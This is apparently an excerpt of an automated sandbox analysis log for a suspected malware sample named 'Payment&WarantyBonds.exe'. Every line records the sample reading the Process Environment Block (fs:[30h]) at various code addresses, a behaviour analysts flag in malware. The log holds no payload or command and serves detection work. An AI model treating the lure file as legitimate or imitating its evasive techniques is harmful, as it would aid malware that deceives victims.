Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0149D0C0 mov eax, dword ptr fs:[00000030h] 2_2_0149D0C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0149D0C0 mov eax, dword ptr fs:[00000030h] 2_2_0149D0C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A20DE mov eax, dword ptr fs:[00000030h] 2_2_014A20DE
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F50D9 mov eax, dword ptr fs:[00000030h] 2_2_014F50D9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014490DB mov eax, dword ptr fs:[00000030h] 2_2_014490DB
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014450E4 mov eax, dword ptr fs:[00000030h] 2_2_014450E4
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014450E4 mov ecx, dword ptr fs:[00000030h] 2_2_014450E4
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_0141A0E3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A60E0 mov eax, dword ptr fs:[00000030h] 2_2_014A60E0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014280E9 mov eax, dword ptr fs:[00000030h] 2_2_014280E9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141C0F0 mov eax, dword ptr fs:[00000030h] 2_2_0141C0F0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014620F0 mov ecx, dword ptr fs:[00000030h] 2_2_014620F0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142208A mov eax, dword ptr fs:[00000030h] 2_2_0142208A
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014AD080 mov eax, dword ptr fs:[00000030h] 2_2_014AD080
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014AD080 mov eax, dword ptr fs:[00000030h] 2_2_014AD080
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141D08D mov eax, dword ptr fs:[00000030h] 2_2_0141D08D
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01425096 mov eax, dword ptr fs:[00000030h] 2_2_01425096
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144D090 mov eax, dword ptr fs:[00000030h] 2_2_0144D090
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144D090 mov eax, dword ptr fs:[00000030h] 2_2_0144D090
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145909C mov eax, dword ptr fs:[00000030h] 2_2_0145909C
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B80A8 mov eax, dword ptr fs:[00000030h] 2_2_014B80A8
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E60B8 mov eax, dword ptr fs:[00000030h] 2_2_014E60B8
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E60B8 mov ecx, dword ptr fs:[00000030h] 2_2_014E60B8
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h] 2_2_014A2349
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h] 2_2_014A2349
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h] 2_2_014A2349
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h] 2_2_014A2349
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h] 2_2_014A2349
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h] 2_2_014A2349
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h] 2_2_014A2349
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h] 2_2_014A2349
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h] 2_2_014A2349
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h] 2_2_014A2349
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h] 2_2_014A2349
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h] 2_2_014A2349
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h] 2_2_014A2349
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h] 2_2_014A2349
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h] 2_2_014A2349
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141D34C mov eax, dword ptr fs:[00000030h] 2_2_0141D34C
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141D34C mov eax, dword ptr fs:[00000030h] 2_2_0141D34C
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F5341 mov eax, dword ptr fs:[00000030h] 2_2_014F5341
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01419353 mov eax, dword ptr fs:[00000030h] 2_2_01419353
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01419353 mov eax, dword ptr fs:[00000030h] 2_2_01419353
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A035C mov eax, dword ptr fs:[00000030h] 2_2_014A035C
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A035C mov eax, dword ptr fs:[00000030h] 2_2_014A035C
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A035C mov eax, dword ptr fs:[00000030h] 2_2_014A035C
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A035C mov ecx, dword ptr fs:[00000030h] 2_2_014A035C
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A035C mov eax, dword ptr fs:[00000030h] 2_2_014A035C
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A035C mov eax, dword ptr fs:[00000030h] 2_2_014A035C
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014EA352 mov eax, dword ptr fs:[00000030h] 2_2_014EA352
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014DF367 mov eax, dword ptr fs:[00000030h] 2_2_014DF367
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014C437C mov eax, dword ptr fs:[00000030h] 2_2_014C437C
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01427370 mov eax, dword ptr fs:[00000030h] 2_2_01427370
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01427370 mov eax, dword ptr fs:[00000030h] 2_2_01427370
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01427370 mov eax, dword ptr fs:[00000030h] 2_2_01427370
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A930B mov eax, dword ptr fs:[00000030h] 2_2_014A930B
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A930B mov eax, dword ptr fs:[00000030h] 2_2_014A930B
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A930B mov eax, dword ptr fs:[00000030h] 2_2_014A930B
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145A30B mov eax, dword ptr fs:[00000030h] 2_2_0145A30B
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145A30B mov eax, dword ptr fs:[00000030h] 2_2_0145A30B
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145A30B mov eax, dword ptr fs:[00000030h] 2_2_0145A30B
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141C310 mov ecx, dword ptr fs:[00000030h] 2_2_0141C310
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01440310 mov ecx, dword ptr fs:[00000030h] 2_2_01440310
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E132D mov eax, dword ptr fs:[00000030h] 2_2_014E132D
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E132D mov eax, dword ptr fs:[00000030h] 2_2_014E132D
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144F32A mov eax, dword ptr fs:[00000030h] 2_2_0144F32A
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01417330 mov eax, dword ptr fs:[00000030h] 2_2_01417330
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014DC3CD mov eax, dword ptr fs:[00000030h] 2_2_014DC3CD
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0142A3C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0142A3C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0142A3C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0142A3C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0142A3C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0142A3C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014283C0 mov eax, dword ptr fs:[00000030h] 2_2_014283C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014283C0 mov eax, dword ptr fs:[00000030h] 2_2_014283C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014283C0 mov eax, dword ptr fs:[00000030h] 2_2_014283C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014283C0 mov eax, dword ptr fs:[00000030h] 2_2_014283C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A63C0 mov eax, dword ptr fs:[00000030h] 2_2_014A63C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014DB3D0 mov ecx, dword ptr fs:[00000030h] 2_2_014DB3D0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h] 2_2_014303E9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h] 2_2_014303E9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h] 2_2_014303E9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h] 2_2_014303E9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h] 2_2_014303E9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h] 2_2_014303E9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h] 2_2_014303E9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h] 2_2_014303E9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014DF3E6 mov eax, dword ptr fs:[00000030h] 2_2_014DF3E6
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F53FC mov eax, dword ptr fs:[00000030h] 2_2_014F53FC
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0143E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0143E3F0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0143E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0143E3F0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0143E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0143E3F0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014563FF mov eax, dword ptr fs:[00000030h] 2_2_014563FF
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141E388 mov eax, dword ptr fs:[00000030h] 2_2_0141E388
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141E388 mov eax, dword ptr fs:[00000030h] 2_2_0141E388
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141E388 mov eax, dword ptr fs:[00000030h] 2_2_0141E388
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144438F mov eax, dword ptr fs:[00000030h] 2_2_0144438F
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144438F mov eax, dword ptr fs:[00000030h] 2_2_0144438F
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F539D mov eax, dword ptr fs:[00000030h] 2_2_014F539D
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01418397 mov eax, dword ptr fs:[00000030h] 2_2_01418397
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01418397 mov eax, dword ptr fs:[00000030h] 2_2_01418397
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01418397 mov eax, dword ptr fs:[00000030h] 2_2_01418397
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0147739A mov eax, dword ptr fs:[00000030h] 2_2_0147739A
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0147739A mov eax, dword ptr fs:[00000030h] 2_2_0147739A
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014433A5 mov eax, dword ptr fs:[00000030h] 2_2_014433A5
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014533A0 mov eax, dword ptr fs:[00000030h] 2_2_014533A0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014533A0 mov eax, dword ptr fs:[00000030h] 2_2_014533A0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01419240 mov eax, dword ptr fs:[00000030h] 2_2_01419240
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01419240 mov eax, dword ptr fs:[00000030h] 2_2_01419240
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145724D mov eax, dword ptr fs:[00000030h] 2_2_0145724D
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A8243 mov eax, dword ptr fs:[00000030h] 2_2_014A8243
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A8243 mov ecx, dword ptr fs:[00000030h] 2_2_014A8243
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141A250 mov eax, dword ptr fs:[00000030h] 2_2_0141A250
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014DB256 mov eax, dword ptr fs:[00000030h] 2_2_014DB256
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014DB256 mov eax, dword ptr fs:[00000030h] 2_2_014DB256
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01426259 mov eax, dword ptr fs:[00000030h] 2_2_01426259
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01424260 mov eax, dword ptr fs:[00000030h] 2_2_01424260
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01424260 mov eax, dword ptr fs:[00000030h] 2_2_01424260
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01424260 mov eax, dword ptr fs:[00000030h] 2_2_01424260
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014ED26B mov eax, dword ptr fs:[00000030h] 2_2_014ED26B
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014ED26B mov eax, dword ptr fs:[00000030h] 2_2_014ED26B
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141826B mov eax, dword ptr fs:[00000030h] 2_2_0141826B
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01449274 mov eax, dword ptr fs:[00000030h] 2_2_01449274
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01461270 mov eax, dword ptr fs:[00000030h] 2_2_01461270
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01461270 mov eax, dword ptr fs:[00000030h] 2_2_01461270
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h] 2_2_014D0274
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h] 2_2_014D0274
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h] 2_2_014D0274
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h] 2_2_014D0274
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h] 2_2_014D0274
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h] 2_2_014D0274
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h] 2_2_014D0274
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h] 2_2_014D0274
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h] 2_2_014D0274
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h] 2_2_014D0274
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h] 2_2_014D0274
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h] 2_2_014D0274
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01457208 mov eax, dword ptr fs:[00000030h] 2_2_01457208
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_01457208 mov eax, dword ptr fs:[00000030h] 2_2_01457208
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F5227 mov eax, dword ptr fs:[00000030h] 2_2_014F5227
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141823B mov eax, dword ptr fs:[00000030h] 2_2_0141823B
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0142A2C3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0142A2C3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0142A2C3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0142A2C3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0142A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0142A2C3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h] 2_2_0144B2C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h] 2_2_0144B2C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h] 2_2_0144B2C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h] 2_2_0144B2C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h] 2_2_0144B2C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h] 2_2_0144B2C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144B2C0 mov eax, dword ptr fs:[00000030h] 2_2_0144B2C0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014292C5 mov eax, dword ptr fs:[00000030h] 2_2_014292C5
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014292C5 mov eax, dword ptr fs:[00000030h] 2_2_014292C5
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141B2D3 mov eax, dword ptr fs:[00000030h] 2_2_0141B2D3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141B2D3 mov eax, dword ptr fs:[00000030h] 2_2_0141B2D3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0141B2D3 mov eax, dword ptr fs:[00000030h] 2_2_0141B2D3
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144F2D0 mov eax, dword ptr fs:[00000030h] 2_2_0144F2D0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0144F2D0 mov eax, dword ptr fs:[00000030h] 2_2_0144F2D0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h] 2_2_014D12ED
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h] 2_2_014D12ED
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h] 2_2_014D12ED
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h] 2_2_014D12ED
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h] 2_2_014D12ED
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h] 2_2_014D12ED
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h] 2_2_014D12ED
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h] 2_2_014D12ED
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h] 2_2_014D12ED
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h] 2_2_014D12ED
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h] 2_2_014D12ED
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h] 2_2_014D12ED
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h] 2_2_014D12ED
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014D12ED mov eax, dword ptr fs:[00000030h] 2_2_014D12ED
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014302E1 mov eax, dword ptr fs:[00000030h] 2_2_014302E1
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014302E1 mov eax, dword ptr fs:[00000030h] 2_2_014302E1
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014302E1 mov eax, dword ptr fs:[00000030h] 2_2_014302E1
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F52E2 mov eax, dword ptr fs:[00000030h] 2_2_014F52E2
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014DF2F8 mov eax, dword ptr fs:[00000030h] 2_2_014DF2F8
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014192FF mov eax, dword ptr fs:[00000030h] 2_2_014192FF
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145E284 mov eax, dword ptr fs:[00000030h] 2_2_0145E284
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145E284 mov eax, dword ptr fs:[00000030h] 2_2_0145E284
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A0283 mov eax, dword ptr fs:[00000030h] 2_2_014A0283
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A0283 mov eax, dword ptr fs:[00000030h] 2_2_014A0283
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014A0283 mov eax, dword ptr fs:[00000030h] 2_2_014A0283
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014F5283 mov eax, dword ptr fs:[00000030h] 2_2_014F5283
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145329E mov eax, dword ptr fs:[00000030h] 2_2_0145329E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0145329E mov eax, dword ptr fs:[00000030h] 2_2_0145329E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014302A0 mov eax, dword ptr fs:[00000030h] 2_2_014302A0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014302A0 mov eax, dword ptr fs:[00000030h] 2_2_014302A0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014352A0 mov eax, dword ptr fs:[00000030h] 2_2_014352A0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014352A0 mov eax, dword ptr fs:[00000030h] 2_2_014352A0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014352A0 mov eax, dword ptr fs:[00000030h] 2_2_014352A0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014352A0 mov eax, dword ptr fs:[00000030h] 2_2_014352A0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E92A6 mov eax, dword ptr fs:[00000030h] 2_2_014E92A6
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E92A6 mov eax, dword ptr fs:[00000030h] 2_2_014E92A6
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E92A6 mov eax, dword ptr fs:[00000030h] 2_2_014E92A6
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014E92A6 mov eax, dword ptr fs:[00000030h] 2_2_014E92A6
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B72A0 mov eax, dword ptr fs:[00000030h] 2_2_014B72A0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B72A0 mov eax, dword ptr fs:[00000030h] 2_2_014B72A0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B62A0 mov eax, dword ptr fs:[00000030h] 2_2_014B62A0
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014B62A0 mov ecx, dword ptr fs:[00000030h] 2_2_014B62A0
